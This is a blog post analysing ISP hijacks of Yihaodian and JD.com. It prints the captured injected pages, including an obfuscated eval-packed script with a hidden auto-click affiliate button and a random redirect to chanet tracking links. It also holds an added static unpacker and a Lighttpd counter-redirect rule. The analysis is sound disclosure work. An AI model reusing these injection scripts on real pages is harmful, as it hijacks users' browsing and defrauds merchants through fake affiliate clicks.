Caught another new Yihaodian ISP hijack (updated with a JD.com ISP hijack)

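I recently caught a new ISP hijack of Yihaodian (yhd.com). It's the same old trick: the request is hijacked to a page with an IFRAME plus a redirect. How boring. Can't they manage anything with a bit more technical sophistication?

The hijack page is: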

    <html>
        <head></head>
        <body style="margin:0px;overflow-x:hidden;overflow-y:hidden;">
            <iframe id="i" width="100%" height="100%" frameborder="no" style="position:fixed;" onload="" scrolling="auto" src="http://stat.51lama.com/stat/2014-11-24/2014-11-24-3.html">
                #document
    (the contents of the IFRAME are shown below)
            </iframe>
        </body>
    </html>

The content of the nested IFRAME is:

<html>

    <head></head>
    <body>
        <div style="display:none;">
            <script type="text/javascript">
              
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('f 2="";f n=i.E(i.J()*I);9(4.H==""){2="3://8.j.d/?m=g&a=o&l=r&h=0&q=1&v=3%u%5%s.c.6%5"}b{9(n>=G){2="3://8.j.d/?m=g&a=o&l=r&h=0&q=1&v=3%u%5%s.c.6%5"}b{2="3://p.T.6/n?k=O-&e=M&D=1.1.1.1&t=3://R.c.6/"}};9(!x.N){4.z(\'<Q A="y:w" S="P" C="7" U="" L="x.F=\\\'\'+2+\'\\\'">\');4.B(\'7\').8()}b{4.z(\'<a A="y:w" K="\'+2+\'" C="7"></a>\');4.B(\'7\').8()}',57,57,'||mysrc|http|document|2F|com|ihub|click|if||else|yhd|cn||var|yihaodian|l_cd1|Math|linktech|||||A100196947||l_cd2|99999|2Fwww||3A|tu|none|window|display|write|style|getElementById|id|spm|floor|location|50|referrer|100|random|href|onclick|hao123|attachEvent|2mLErnzLWcLErI6H2mLErntl1QLm6EWe6E4HWNKqrI6HkQLErJKe3NyyWnB8rZUKY9y4KQL|button|input|www|type|yiqifa|value'.split('|'),0,{}))

            </script>
            <input id="ihub" type="button" onclick="window.location='window.location='http://click.linktech.cn/?m=yihaodian&a=A100196947&l=99999&l_cd1=0&l_cd2=1&tu=http%3A%2F%2Fwww.yhd.com%2F'" value="" style="display:none"></input>
        </div>
    </body>

</html>

Basically, the nested page contains a hidden button; when you click, it triggers the ad link and then redirects back to yhd.com.
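The packed `eval(function(p,a,c,k,e,d){...})` script above can be read without running it. The following is an added example, not code from the original post: it rebuilds the packer's token dictionary and substitutes the words back statically, then lists the URLs in the result. The sample input is constructed (placeholder host `tracker.example`) and the function names are assumptions of this example.

```javascript
// Added example: statically decode a "p,a,c,k,e,d" packed script. Nothing is eval()'d.

// Token for dictionary index n in the packer's base-`radix` alphabet (0-9, a-z, A-Z).
function encodeIndex(n, radix) {
  const head = n < radix ? "" : encodeIndex(Math.floor(n / radix), radix);
  const r = n % radix;
  return head + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
}

// Substitute every token in payload `p` with its dictionary word.
function unpack(p, radix, count, words) {
  const dict = new Map();
  for (let i = 0; i < count; i++) {
    const token = encodeIndex(i, radix);
    dict.set(token, words[i] || token); // empty slot: the token stands for itself
  }
  return p.replace(/\b\w+\b/g, (tok) => (dict.has(tok) ? dict.get(tok) : tok));
}

// Pull (payload, radix, count, words) out of the packed source text and decode it.
function unpackSource(src) {
  const m = /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/.exec(src);
  if (!m) return null; // not this packer's layout
  const payload = m[1].replace(/\\(['\\])/g, "$1"); // undo \' and \\ only
  return unpack(payload, Number(m[2]), Number(m[3]), m[4].split("|"));
}

// List the URLs that appear in the decoded script.
function extractUrls(code) {
  return code.match(/https?:\/\/[^\s'"<>]+/g) || [];
}

// Constructed sample in the same layout as the script above (packer body elided).
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* ... */return p}('1 2=\'3://4.5/?x=0\';6.7=2',8,8,'|var|mysrc|http|tracker|example|window|location'.split('|'),0,{}))`;

const decoded = unpackSource(SAMPLE);
console.log(decoded);
console.log(extractUrls(decoded));
```

Passing the full text of a captured packed script to `unpackSource` gives the readable source for review; only the `\'` and `\\` escapes are undone, which is an assumption about how the payload string was quoted.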

Heh heh, time for the Lighttpd 301 treatment again.

$HTTP["host"] =~ "^(stat)\.(51lama)\.(com)$" {
    url.redirect = ( "^/(.*)" => "http://www.yhd.com" )
}

Off topic: my first reaction on seeing this domain was "51 lama"...


Update, this time for JD.com:

jd.com is redirected straight to tt4.51lama.com.
The content is:

<head>
  <meta charset="UTF-8">
  <title>京东网上商城-综合网购首选</title>
 </head>
 <body>
  <script language="javascript"> 
window.onload = function(){ 
var arr = ["http://count.chanet.com.cn/click.cgi?a=524637&d=22338&u=&e=&url=http%3A%2F%2Fwww.jd.com",
           "http://count.chanet.com.cn/click.cgi?a=524638&d=22338&u=&e=&url=http%3A%2F%2Fwww.jd.com",
           "http://count.chanet.com.cn/click.cgi?a=524639&d=22338&u=&e=&url=http%3A%2F%2Fwww.jd.com", 
           "http://count.chanet.com.cn/click.cgi?a=524640&d=22338&u=&e=&url=http%3A%2F%2Fwww.jd.com",
           "http://count.chanet.com.cn/click.cgi?a=524641&d=22338&u=&e=&url=http%3A%2F%2Fwww.jd.com"]; 

var index = Math.floor((Math.random()*arr.length));
window.location.href=arr[index]; 

} 
</script> 
 </body>
</html>

Damn, whose kid is this? So accomplished, they've actually learned random numbers and arrays. Come on, throw some confetti~~~
